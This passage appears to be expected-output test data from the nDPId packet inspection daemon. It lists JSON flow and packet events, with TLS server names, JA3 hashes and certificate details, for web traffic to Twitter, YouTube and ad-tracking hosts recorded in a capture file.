-00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2616,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687800,"flow_last_seen":1605291687800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687800,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2616,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1605291687800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687800,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MN8MAAAAAoAL9IICJAAACBAWgBAIICk1+jVUAAAAAAQMDBw=="} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2645,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1605291687829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687829,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGj0KsgqAcsBIEmLB5kd7IUo3\/YpAbvdzp1dXkT\/jDfEoBJXgChEAAACBAV4AQMDAwQCCArC1z+HTX6NVQ=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2646,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1605291687829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687829,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MN8SdXV5FgBAB+6w4AAABAQgKTX6NcsLXP4c="} -00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2647,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687800,"flow_last_seen":1605291687829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687829,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2651,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687761,"flow_last_seen":1605291687852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687852,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687896,"flow_last_seen":1605291687896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687896,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1605291687896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687896,"pkt":"qtsDr8lk5EKm5WPyht1gD27HACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAieM+UmsoBu3fYetUAAAAAoAL9ICsYAAACBAWgBAIIClOdBf4AAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2916,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687931,"flow_last_seen":1605291687931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687931,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2916,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1605291687931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687931,"pkt":"qtsDr8lk5EKm5WPyht1gCkMmACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1k4Bu9FF0vYAAAAAoAL9ILpIAAACBAWgBAIICnCSuGYAAAAAAQMDBw=="} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2917,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1605291687932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687932,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAACJ4z5QqAcsBIEmLB5kd7IUo3\/YpAbuayhO+xPN32HrWoBJXgPVcAAACBAV4AQMDAwQCCArC1z\/tU50F\/g=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2918,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1605291687932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687932,"pkt":"qtsDr8lk5EKm5WPyht1gD27HACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAieM+UmsoBu3fYetYTvsT0gBAB+3lKAAABAQgKU50GIsLXP+0="} -00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2919,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687896,"flow_last_seen":1605291687933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2920,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687933,"flow_last_seen":1605291687933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2920,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1605291687933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687933,"pkt":"qtsDr8lk5EKm5WPyht1gBZTsACgGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIfkWUEn4fxCOvggBu9JG6EoAAAAAoAL9IFfFAAACBAWgBAIICteKYnsAAAAAAQMDBw=="} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2921,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687934,"flow_last_seen":1605291687934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687934,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2921,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1605291687934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687934,"pkt":"qtsDr8lk5EKm5WPyht1gA0MZACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAXNobxrOgBu0Y7yJAAAAAAoAL9ICibAAACBAWgBAIIClHJL\/gAAAAAAQMDBw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2996,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1605291687966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687966,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvWTrVWRoTRRdL3oBJXgGFBAAACBAV4AQMDAwQCCArC10AQcJK4Zg=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2997,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1605291687966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687966,"pkt":"qtsDr8lk5EKm5WPyht1gCkMmACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1k4Bu9FF0ve1VkaFgBAB++UvAAABAQgKcJK4icLXQBA="} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2998,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687931,"flow_last_seen":1605291687966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1605291687974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687974,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYgARaADQAh+RZQSfh\/EI4qAcsBIEmLB5kd7IUo3\/YpAbu+CLYiE5XSRuhLoBJXgDDhAAACBAV4AQMDAwQCCArC10AQ14piew=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3002,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1605291687974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687974,"pkt":"qtsDr8lk5EKm5WPyht1gBZTsACAGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIfkWUEn4fxCOvggBu9JG6Eu2IhOWgBAB+7TJAAABAQgK14pipMLXQBA="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3004,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687933,"flow_last_seen":1605291687974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687974,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3007,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1605291687975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687975,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAABc2hvEqAcsBIEmLB5kd7IUo3\/YpAbus6CNL5ddGO8iRoBJXgMJGAAACBAV4AQMDAwQCCArC10AVUckv+A=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3009,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1605291687975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687975,"pkt":"qtsDr8lk5EKm5WPyht1gA0MZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAXNobxrOgBu0Y7yJEjS+XYgBAB+0YvAAABAQgKUckwIcLXQBU="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3014,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687934,"flow_last_seen":1605291687975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687975,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3016,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687896,"flow_last_seen":1605291687976,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687976,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687931,"flow_last_seen":1605291688024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3113,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687934,"flow_last_seen":1605291688025,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688025,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3144,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3147,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3881,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","server_names":"*.quantserve.com,*.quantcount.com,*.apextag.com,quantserve.com,quantcount.com,apextag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Quantcast Corporation, CN=*.quantserve.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:30:B1:4A:CE:62:AF:55:B1:89:FF:0C:CB:69:E3:80:CB:B0:91:90"}} -01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3171,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01459{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3174,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3956,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","server_names":"syndication.twitter.com,syndication.twimg.com,syndication-o.twitter.com,syndication-o.twimg.com,cdn.syndication.twitter.com,cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=lon3, CN=syndication.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"09:D3:FE:9A:3E:39:A7:E2:90:5B:C9:1F:3B:7D:CE:7C:7E:08:1C:6F"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3346,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688324,"flow_last_seen":1605291688324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688324,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 